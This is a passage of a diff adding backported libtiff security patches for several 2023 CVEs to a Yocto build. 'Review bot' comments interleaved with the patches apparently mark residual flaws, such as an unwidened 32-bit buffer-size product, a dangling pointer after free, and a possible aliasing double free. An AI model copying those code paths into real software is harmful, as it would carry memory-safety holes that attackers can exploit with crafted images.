98@@ -8515,7 +8522,8 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
99 uint32 bytes_per_pixel, bytes_per_sample;
100 uint32 row, rowsize, src_offset, dst_offset;
101 uint32 i, col, width, length;
102- uint32 colsize, buffsize, col_offset, pix_offset;
103+ uint32 colsize, col_offset, pix_offset;
104+ tmsize_t buffsize;
105 unsigned char *ibuff;
106 unsigned char *src;
107 unsigned char *dst;
108@@ -8528,12 +8536,41 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
109 spp = image->spp;
110 bps = image->bps;
111
112+ if ((spp != 0 && bps != 0 &&
113+ width > (uint32_t)((UINT32_MAX - 7) / spp / bps)) ||
114+ (spp != 0 && bps != 0 &&
115+ length > (uint32_t)((UINT32_MAX - 7) / spp / bps)))
116+ {
117+ TIFFError("rotateImage", "Integer overflow detected.");
118+ return (-1);
119+ }
120+
121 rowsize = ((bps * spp * width) + 7) / 8;
122 colsize = ((bps * spp * length) + 7) / 8;
123 if ((colsize * width) > (rowsize * length))
124- buffsize = (colsize + 1) * width;
125+{
126+ if (((tmsize_t)colsize + 1) != 0 &&
127+ (tmsize_t)width > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
128+ ((tmsize_t)colsize + 1)))
129+ {
130+ TIFFError("rotateImage",
131+ "Integer overflow when calculating buffer size.");
132+ return (-1);
133+ }
134+ buffsize = ((tmsize_t)colsize + 1) * width;
135+ }
136 else
137- buffsize = (rowsize + 1) * length;
138+ {
139+ if (((tmsize_t)rowsize + 1) != 0 &&
140+ (tmsize_t)length > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
141+ ((tmsize_t)rowsize + 1)))
142+ {
143+ TIFFError("rotateImage",
144+ "Integer overflow when calculating buffer size.");
145+ return (-1);
146+ }
147+ buffsize = (rowsize + 1) * length;
148+ }
149
150 bytes_per_sample = (bps + 7) / 8;
151 bytes_per_pixel = ((bps * spp) + 7) / 8;
152@@ -8556,11 +8593,17 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
153 /* Add 3 padding bytes for extractContigSamplesShifted32bits */
154 if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
155 {
156- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
157+ TIFFError("rotateImage",
158+ "Unable to allocate rotation buffer of %" TIFF_SSIZE_FORMAT
159+ " bytes ",
160+ buffsize + NUM_BUFF_OVERSIZE_BYTES);
161 return (-1);
162 }
163 _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
164
165+ if (rot_buf_size != NULL)
166+ *rot_buf_size = buffsize;
167+
168 ibuff = *ibuff_ptr;
169 switch (rotation)
170 {
171--
1722.25.1
173
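Review bot: In rotateImage the `else` branch still computes `buffsize = (rowsize + 1) * length;` in 32-bit arithmetic, while the `if` branch was changed to `((tmsize_t)colsize + 1) * width`. The overflow test just above it is done in tmsize_t, so the product itself can still wrap before it is widened into `buffsize`. It should read `buffsize = ((tmsize_t)rowsize + 1) * length;`. The body also writes through `rot_buf_size`, but no hunk in this patch adds that parameter to the definition (only the prototype changes), so the file appears to build only together with CVE-2023-25434-CVE-2023-25435.patch.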
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
new file mode 100644
index 0000000000..6a6596f092
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
@@ -0,0 +1,94 @@
1From 69818e2f2d246e6631ac2a2da692c3706b849c38 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Sun, 29 Jan 2023 11:09:26 +0100
4Subject: [PATCH] tiffcrop: Amend rotateImage() not to toggle the input (main)
5 image width and length parameters when only cropped image sections are
6 rotated. Remove buffptr from region structure because never used.
7
8Closes #492 #493 #494 #495 #499 #518 #519
9
10Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/69818e2f2d246e6631ac2a2da692c3706b849c38]
11CVE: CVE-2023-25434 & CVE-2023-25435
12Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
13---
14 tools/tiffcrop.c | 29 +++++++++++++++++------------
15 1 file changed, 17 insertions(+), 12 deletions(-)
16
17diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
18index aab0ec6..ce84414 100644
19--- a/tools/tiffcrop.c
20+++ b/tools/tiffcrop.c
21@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
22 static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
23 uint32, uint32, uint8 *, uint8 *);
24 static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
25- unsigned char **, size_t *);
26+ unsigned char **, size_t *, int);
27 static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
28 unsigned char *);
29 static int invertImage(uint16, uint16, uint16, uint32, uint32,
30@@ -6382,10 +6382,11 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
31 /* Dummy variable in order not to switch two times the
32 * image->width,->length within rotateImage(),
33 * but switch xres, yres there. */
34- uint32_t width = image->width;
35- uint32_t length = image->length;
36- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
37- {
38+ uint32_t width = image->width;
39+ uint32_t length = image->length;
40+ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL,
41+ TRUE))
42+ {
43 TIFFError ("correct_orientation", "Unable to rotate image");
44 return (-1);
45 }
46@@ -7612,7 +7613,8 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
47 * accordingly. */
48 size_t rot_buf_size = 0;
49 if (rotateImage(crop->rotation, image, &crop->combined_width,
50- &crop->combined_length, &crop_buff, &rot_buf_size))
51+ &crop->combined_length, &crop_buff, &rot_buf_size,
52+ FALSE))
53 {
54 TIFFError("processCropSelections",
55 "Failed to rotate composite regions by %d degrees", crop->rotation);
56@@ -7721,9 +7723,10 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
57 * its size individually. Therefore, seg_buffs size needs to be
58 * updated accordingly. */
59 size_t rot_buf_size = 0;
60- if (rotateImage(
61- crop->rotation, image, &crop->regionlist[i].width,
62- &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
63+ if (rotateImage(crop->rotation, image,
64+ &crop->regionlist[i].width,
65+ &crop->regionlist[i].length, &crop_buff,
66+ &rot_buf_size, FALSE))
67 {
68 TIFFError("processCropSelections",
69 "Failed to rotate crop region by %d degrees", crop->rotation);
70@@ -7853,7 +7856,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
71 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
72 {
73 if (rotateImage(crop->rotation, image, &crop->combined_width,
74- &crop->combined_length, crop_buff_ptr, NULL))
75+ &crop->combined_length, crop_buff_ptr, NULL, TRUE))
76 {
77 TIFFError("createCroppedImage",
78 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
79@@ -8515,8 +8518,10 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
80
81 /* Rotate an image by a multiple of 90 degrees clockwise */
82 static int
83-rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
84- uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
85+rotateImage(uint16 rotation, struct image_data *image,
86+ uint32 *img_width, uint32 *img_length,
87+ unsigned char **ibuff_ptr, size_t *rot_buf_size,
88+ int rot_image_params)
89 {
90 int shift_width;
91 uint32 bytes_per_pixel, bytes_per_sample;
92--
932.25.1
94
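Review bot: The one-line comment above rotateImage (`Rotate an image by a multiple of 90 degrees clockwise`) is left unchanged although the function now takes two arguments that alter its behaviour. I would extend it to say that `rot_buf_size`, when not NULL, receives the size of the newly allocated rotation buffer, and that `rot_image_params` must be TRUE only when the whole input image is rotated, because only then are `image->width`, `image->length`, `xres` and `yres` swapped. A wrong flag at a call site leaves the image dimensions out of step with the buffer, which is the mismatch the patch subject sets out to prevent, so the contract deserves to be written down. The function body lies outside these hunks.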
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
new file mode 100644
index 0000000000..b7a7e93764
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
@@ -0,0 +1,90 @@
1From ec8ef90c1f573c9eb1f17d6a056aa0015f184acf Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Tue, 14 Feb 2023 20:43:43 +0100
4Subject: [PATCH] tiffcrop: Do not reuse input buffer for subsequent images.
5 Fix issue 527
6
7Reuse of read_buff within loadImage() from previous image is quite unsafe, because other functions (like rotateImage() etc.) reallocate that buffer with different size without updating the local prev_readsize value.
8
9Closes #527
10
11Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
12CVE: CVE-2023-26965
13Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
14---
15 tools/tiffcrop.c | 40 ++++++++++------------------------------
16 1 file changed, 10 insertions(+), 30 deletions(-)
17
18diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
19index ce84414..a533089 100644
20--- a/tools/tiffcrop.c
21+++ b/tools/tiffcrop.c
22@@ -5935,9 +5935,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
23 uint32 tw = 0, tl = 0; /* Tile width and length */
24 tmsize_t tile_rowsize = 0;
25 unsigned char *read_buff = NULL;
26- unsigned char *new_buff = NULL;
27 int readunit = 0;
28- static tmsize_t prev_readsize = 0;
29
30 TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
31 TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
32@@ -6232,37 +6230,20 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
33 read_buff = *read_ptr;
34 /* +3 : add a few guard bytes since reverseSamples16bits() can read a bit */
35 /* outside buffer */
36- if (!read_buff)
37+ if (read_buff)
38 {
39- if( buffsize > 0xFFFFFFFFU - 3 )
40- {
41- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
42- return (-1);
43- }
44- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
45+ _TIFFfree(read_buff);
46 }
47- else
48- {
49- if (prev_readsize < buffsize)
50- {
51- if( buffsize > 0xFFFFFFFFU - 3 )
52- {
53- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
54- return (-1);
55- }
56- new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
57- if (!new_buff)
58- {
59- free (read_buff);
60- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
61- }
62- else
63- read_buff = new_buff;
64- }
65- }
66+ if (buffsize > 0xFFFFFFFFU - 3)
67+ {
68+ TIFFError("loadImage", "Required read buffer size too large");
69+ return (-1);
70+ }
71+ read_buff =
72+ (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
73 if (!read_buff)
74 {
75- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
76+ TIFFError("loadImage", "Unable to allocate read buffer");
77 return (-1);
78 }
79
80@@ -6270,7 +6251,6 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
81 read_buff[buffsize+1] = 0;
82 read_buff[buffsize+2] = 0;
83
84- prev_readsize = buffsize;
85 *read_ptr = read_buff;
86
87 /* N.B. The read functions used copy separate plane data into a buffer as interleaved
88--
892.25.1
90
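Review bot: loadImage now frees `read_buff` before the size check and the allocation, but `*read_ptr` is only updated after both succeed, so on either `return (-1)` the caller is left holding a pointer to freed memory. Clearing it at the point of release, `_TIFFfree(read_buff); *read_ptr = read_buff = NULL;`, keeps the error paths safe whatever the caller does next. How the caller treats its buffer after a failed load is outside the hunk.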
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
new file mode 100644
index 0000000000..48657e6aa4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
@@ -0,0 +1,35 @@
1From b0e1c25dd1d065200c8d8f59ad0afe014861a1b9 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Thu, 16 Feb 2023 12:03:16 +0100
4Subject: [PATCH] tif_luv: Check and correct for NaN data in uv_encode().
5
6Closes #530
7
8Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
9CVE: CVE-2023-26966
10Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
11---
12 libtiff/tif_luv.c | 7 +++++++
13 1 file changed, 7 insertions(+)
14
15diff --git a/libtiff/tif_luv.c b/libtiff/tif_luv.c
16index 6fe4858..8b2c5f1 100644
17--- a/libtiff/tif_luv.c
18+++ b/libtiff/tif_luv.c
19@@ -923,6 +923,13 @@ uv_encode(double u, double v, int em) /* encode (u',v') coordinates */
20 {
21 register int vi, ui;
22
23+ /* check for NaN */
24+ if (u != u || v != v)
25+ {
26+ u = U_NEU;
27+ v = V_NEU;
28+ }
29+
30 if (v < UV_VSTART)
31 return oog_encode(u, v);
32 vi = itrunc((v - UV_VSTART)*(1./UV_SQSIZ), em);
33--
342.25.1
35
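Review bot: The NaN test `if (u != u || v != v)` in uv_encode relies on IEEE comparison semantics that a compiler may drop under `-ffast-math` or `-ffinite-math-only`, in which case the guard silently disappears. A comment such as `/* self-comparison is the NaN test; this file must not be built with -ffinite-math-only */` would record that dependency next to the check. Infinite inputs are not covered by it; whether the range tests that follow handle them is outside the hunk.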
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
new file mode 100644
index 0000000000..62a5e1831c
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
@@ -0,0 +1,33 @@
1From 8c0859a80444c90b8dfb862a9f16de74e16f0a9e Mon Sep 17 00:00:00 2001
2From: xiaoxiaoafeifei <lliangliang2007@163.com>
3Date: Fri, 21 Apr 2023 13:01:34 +0000
4Subject: [PATCH] countInkNamesString(): fix `UndefinedBehaviorSanitizer`:
5 applying zero offset to null pointer
6
7Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f]
8CVE: CVE-2023-2908
9Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
10---
11 libtiff/tif_dir.c | 4 ++--
12 1 file changed, 2 insertions(+), 2 deletions(-)
13
14diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
15index 9d8267a..6389b40 100644
16--- a/libtiff/tif_dir.c
17+++ b/libtiff/tif_dir.c
18@@ -145,10 +145,10 @@ static uint16
19 countInkNamesString(TIFF *tif, uint32 slen, const char *s)
20 {
21 uint16 i = 0;
22- const char *ep = s + slen;
23- const char *cp = s;
24
25 if (slen > 0) {
26+ const char *ep = s + slen;
27+ const char *cp = s;
28 do {
29 for (; cp < ep && *cp != '\0'; cp++) {}
30 if (cp >= ep)
31--
322.25.1
33
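Review bot: Moving `ep` and `cp` inside `if (slen > 0)` in countInkNamesString avoids the pointer arithmetic for the empty case, but a NULL `s` with a non-zero `slen` still reaches `s + slen` and `*cp`. If callers cannot guarantee that this combination never occurs, the condition should be `if (slen > 0 && s != NULL)`; otherwise a comment stating the precondition is enough. What the function returns when the block is skipped is outside the hunk. The `From` line names commit 8c0859a8 while Upstream-Status points at 9bd48f0d, so it is worth confirming which upstream commit this file tracks.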
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
new file mode 100644
index 0000000000..8db24fc714
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
@@ -0,0 +1,59 @@
1From d63de61b1ec3385f6383ef9a1f453e4b8b11d536 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 3 Feb 2023 17:38:55 +0100
4Subject: [PATCH] TIFFClose() avoid NULL pointer dereferencing. fix#515
5
6Closes #515
7
8Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/d63de61b1ec3385f6383ef9a1f453e4b8b11d536]
9CVE: CVE-2023-3316
10Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
11---
12 libtiff/tif_close.c | 11 +++++++----
13 tools/tiffcrop.c | 5 ++++-
14 2 files changed, 11 insertions(+), 5 deletions(-)
15
16diff --git a/libtiff/tif_close.c b/libtiff/tif_close.c
17index e4228df..335e80f 100644
18--- a/libtiff/tif_close.c
19+++ b/libtiff/tif_close.c
20@@ -118,13 +118,16 @@ TIFFCleanup(TIFF* tif)
21 */
22
23 void
24-TIFFClose(TIFF* tif)
25+TIFFClose(TIFF *tif)
26 {
27- TIFFCloseProc closeproc = tif->tif_closeproc;
28- thandle_t fd = tif->tif_clientdata;
29+ if (tif != NULL)
30+ {
31+ TIFFCloseProc closeproc = tif->tif_closeproc;
32+ thandle_t fd = tif->tif_clientdata;
33
34 TIFFCleanup(tif);
35- (void) (*closeproc)(fd);
36+ (void)(*closeproc)(fd);
37+ }
38 }
39
40 /* vim: set ts=8 sts=8 sw=8 noet: */
41diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
42index a533089..f14bb0c 100644
43--- a/tools/tiffcrop.c
44+++ b/tools/tiffcrop.c
45@@ -2526,7 +2526,10 @@ main(int argc, char* argv[])
46 }
47 }
48
49- TIFFClose(out);
50+ if (out != NULL)
51+ {
52+ TIFFClose(out);
53+ }
54
55 return (0);
56 } /* end main */
57--
582.25.1
59
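Review bot: TIFFClose now returns silently for a NULL handle, yet the comment block above it (outside the hunk) is not touched, so the documented contract does not say that NULL is accepted. I would add a sentence there, for example `A NULL tif is ignored.` With that guard in the library, the `if (out != NULL)` wrapper added in tiffcrop's main is redundant, though harmless if the tool is ever linked against a libtiff without the guard.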
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
new file mode 100644
index 0000000000..67837fe142
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
@@ -0,0 +1,35 @@
1From 881a070194783561fd209b7c789a4e75566f7f37 Mon Sep 17 00:00:00 2001
2From: zhailiangliang <zhailiangliang@loongson.cn>
3Date: Tue, 7 Mar 2023 15:02:08 +0800
4Subject: [PATCH] Fix memory leak in tiffcrop.c
5
6Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/881a070194783561fd209b7c789a4e75566f7f37]
7CVE: CVE-2023-3576
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
10---
11 tools/tiffcrop.c | 7 ++++++-
12 1 file changed, 6 insertions(+), 1 deletion(-)
13
14diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
15index f14bb0c..7121c7c 100644
16--- a/tools/tiffcrop.c
17+++ b/tools/tiffcrop.c
18@@ -7746,8 +7746,13 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
19
20 read_buff = *read_buff_ptr;
21
22+ /* Memory is freed before crop_buff_ptr is overwritten */
23+ if (*crop_buff_ptr != NULL)
24+ {
25+ _TIFFfree(*crop_buff_ptr);
26+ }
27+
28 /* process full image, no crop buffer needed */
29- crop_buff = read_buff;
30 *crop_buff_ptr = read_buff;
31 crop->combined_width = image->width;
32 crop->combined_length = image->length;
33--
342.25.1
35
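Review bot: createCroppedImage now frees `*crop_buff_ptr` and then stores `read_buff` in it, so if an earlier call left `*crop_buff_ptr` aliasing the read buffer (this same function assigns it that way), the free can release the buffer that is about to be handed back, or one that has already been released elsewhere. Whether the caller resets its crop pointer between images is outside the hunk. A guard such as `if (*crop_buff_ptr != NULL && *crop_buff_ptr != read_buff)` covers the direct alias, and a comment stating who owns the crop buffer after this call would make the remaining cases reviewable. The hunk also removes `crop_buff = read_buff;`, so any later use of the local `crop_buff` on this path should be checked in the part of the function not shown.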
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
new file mode 100644
index 0000000000..fd67305c0b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
@@ -0,0 +1,47 @@
1From b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 5 May 2023 19:43:46 +0200
4Subject: [PATCH] Consider error return of writeSelections(). Fixes #553
5
6Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8]
7CVE: CVE-2023-3618
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 tools/tiffcrop.c | 14 ++++++++++----
11 1 file changed, 10 insertions(+), 4 deletions(-)
12
13diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
14index 7121c7c..93b7f96 100644
15--- a/tools/tiffcrop.c
16+++ b/tools/tiffcrop.c
17@@ -2437,9 +2437,15 @@ main(int argc, char* argv[])
18 { /* Whole image or sections not based on output page size */
19 if (crop.selections > 0)
20 {
21- writeSelections(in, &out, &crop, &image, &dump, seg_buffs,
22- mp, argv[argc - 1], &next_page, total_pages);
23- }
24+ if (writeSelections(in, &out, &crop, &image, &dump,
25+ seg_buffs, mp, argv[argc - 1],
26+ &next_page, total_pages))
27+ {
28+ TIFFError("main",
29+ "Unable to write new image selections");
30+ exit(EXIT_FAILURE);
31+ }
32+ }
33 else /* One file all images and sections */
34 {
35 if (update_output_file (&out, mp, crop.exp_mode, argv[argc - 1],
36@@ -7749,7 +7755,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
37 /* Memory is freed before crop_buff_ptr is overwritten */
38 if (*crop_buff_ptr != NULL)
39 {
40- _TIFFfree(*crop_buff_ptr);
41+ _TIFFfree(*crop_buff_ptr);
42 }
43
44 /* process full image, no crop buffer needed */
45--
462.25.1
47
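Review bot: The second hunk only re-indents the `_TIFFfree(*crop_buff_ptr);` line that CVE-2023-3576.patch introduces, which makes this file apply only after that one. I would note the dependency in the patch header, or drop the whitespace-only hunk, so the two CVE fixes can be reordered or removed independently. In main, the new failure path calls `exit(EXIT_FAILURE)` without closing `out`; whether a partially written output file is left behind is not visible from the hunk.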
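--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
@@ -0,0 +1,34 @@
+From 4fc16f649fa2875d5c388cf2edc295510a247ee5 Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:34:25 +0000
+Subject: [PATCH] tiffcp: fix memory corruption (overflow) on hostile images
+ (fixes #591)
+
+Upstream-Status: Backport from [https://gitlab.com/libtiff/libtiff/-/commit/4fc16f649fa2875d5c388cf2edc295510a247ee5]
+CVE: CVE-2023-40745
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcp.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 83b3910..007bd05 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1437,6 +1437,13 @@ DECLAREreadFunc(readSeparateTilesIntoBuffer)
+ TIFFError(TIFFFileName(in), "Error, cannot handle that much samples per tile row (Tile Width * Samples/Pixel)");
+ return 0;
+ }
++
++ if ( (imagew - tilew * spp) > INT_MAX ){
++ TIFFError(TIFFFileName(in),
++ "Error, image raster scan line size is too large");
++ return 0;
++ }
++
+ iskew = imagew - tilew*spp;
+ tilebuf = _TIFFmalloc(tilesize);
+ if (tilebuf == 0)
+--
+2.25.1
+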
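Review bot: The guard `if ( (imagew - tilew * spp) > INT_MAX )` in readSeparateTilesIntoBuffer is only effective if the subtraction is evaluated in a type wider than `int`; `imagew`, `tilew` and `spp` are declared outside this hunk, so that cannot be confirmed here. If the operands were 32-bit, the expression would already have wrapped before the comparison and the following `iskew = imagew - tilew*spp;` would be unprotected. The patch also uses `INT_MAX` without adding `#include <limits.h>`, which CVE-2023-41175.patch does add for raw2tiff.c, so check that tools/tiffcp.c already includes it. A one-line comment above the guard, `/* iskew is presumably an int: reject differences that do not fit */`, would record why the bound is INT_MAX.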
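--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
@@ -0,0 +1,67 @@
+From 4cc97e3dfa6559f4d17af0d0687bcae07ca4b73d Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:40:01 +0000
+Subject: raw2tiff: fix integer overflow and bypass of the check (fixes #592)
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/6e2dac5f904496d127c92ddc4e56eccfca25c2ee]
+CVE: CVE-2023-41175
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/raw2tiff.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/tools/raw2tiff.c b/tools/raw2tiff.c
+index ab36ff4e..a905da52 100644
+--- a/tools/raw2tiff.c
++++ b/tools/raw2tiff.c
+@@ -35,6 +35,7 @@
+ #include <sys/types.h>
+ #include <math.h>
+ #include <ctype.h>
++#include <limits.h>
+
+ #ifdef HAVE_UNISTD_H
+ # include <unistd.h>
+@@ -101,6 +102,7 @@ main(int argc, char* argv[])
+ int fd;
+ char *outfilename = NULL;
+ TIFF *out;
++ uint32 temp_limit_check = 0;
+
+ uint32 row, col, band;
+ int c;
+@@ -212,6 +214,30 @@ main(int argc, char* argv[])
+ if (guessSize(fd, dtype, hdr_size, nbands, swab, &width, &length) < 0)
+ return 1;
+
++ if ((width == 0) || (length == 0) ){
++ fprintf(stderr, "Too large nbands value specified.\n");
++ return (EXIT_FAILURE);
++ }
++
++ temp_limit_check = nbands * depth;
++
++ if ( !temp_limit_check || length > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large length size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * length;
++
++ if ( !temp_limit_check || width > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large width size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * width;
++
++ if ( !temp_limit_check || hdr_size > ( UINT_MAX - temp_limit_check ) ) {
++ fprintf(stderr, "Too large header size specified.\n");
++ return (EXIT_FAILURE);
++ }
++
+ if (outfilename == NULL)
+ outfilename = argv[optind+1];
+ out = TIFFOpen(outfilename, "w");
+--
+2.30.2
+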
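Review bot: The first product, `temp_limit_check = nbands * depth;`, is computed without the division guard that the later `length`, `width` and `hdr_size` steps get, so a wrapped 32-bit result that happens to be non-zero would be accepted as the base for every following check. `nbands` and `depth` are declared outside the hunk, so this is inferred from the `uint32 temp_limit_check` declaration; a guard before the multiplication, `if (depth == 0 || nbands > UINT_MAX / depth) { fprintf(stderr, "Too large nbands value specified.\n"); return (EXIT_FAILURE); }`, would cover it. That message currently sits on the `(width == 0) || (length == 0)` test, where it does not describe the condition being checked. The patch header also names two different commits (the `From` hash and the "Upstream commit" URL), which is worth a sentence of explanation for anyone verifying the backport.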
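--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
@@ -0,0 +1,53 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFErrorExt instead of TIFFErrorExtR (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 51558511bdbbcffdce534db21dbaf5d54b31638a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 15:58:41 +0100
+Subject: [PATCH] TIFFReadRGBAStrip/TIFFReadRGBATile: add more validation of
+ col/row (fixes #622)
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-52356.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/51558511bdbbcffdce534db21dbaf5d54b31638a]
+CVE: CVE-2023-52356
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_getimage.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_getimage.c
++++ tiff-4.1.0+git191117/libtiff/tif_getimage.c
+@@ -2926,6 +2926,13 @@ TIFFReadRGBAStripExt(TIFF* tif, uint32 r
+ }
+
+ if (TIFFRGBAImageOK(tif, emsg) && TIFFRGBAImageBegin(&img, tif, stop_on_error, emsg)) {
++ if (row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row passed to TIFFReadRGBAStrip().");
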